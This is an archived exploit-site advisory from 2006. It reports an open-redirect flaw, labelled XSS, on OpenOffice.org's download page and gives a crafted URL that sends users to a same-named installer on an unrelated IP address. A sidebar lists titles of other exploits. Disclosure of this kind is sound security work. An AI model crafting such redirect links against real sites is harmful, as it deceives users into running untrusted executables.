exploits , vulnerabilities , articles , OpenOffice.org XSS

2006-06-14

OpenOffice.org XSS

Author:    XiON
Date:      JUN1406
Type:      XSS
Product:   http://www.openoffice.org/
Patch:     N/A


Straight URL (From INDIANA U Mirror):
http://download.openoffice.org/2.0.2/contribute.html?continue=ftp%3A//ftp.ussg.iu.edu/pub/openoffice/stable/2.0.2/OOo_2.0.2_Win32Intel_install_wJRE.exe

Redirected URL:
http://download.openoffice.org/2.0.2/contribute.html?continue=http://216.66.19.100/~clockwo/OpenOffice/OOo_2.0.2_Win32Intel_install_wJRE.exe

Note: the file names are the same, 
so an unsuspecting user will hot continue on the download page,
and inadvertently download an unwanted and potentially dangerous file from
what appears to be a reliable website.

securitydot.net - 2006-06-14

Exploits - newest 10 RSS | More

2007-06-15 56178 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 33451 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 41602 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 28801 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 19326 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 16350 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 18987 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 16225 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 33055 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 16865 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit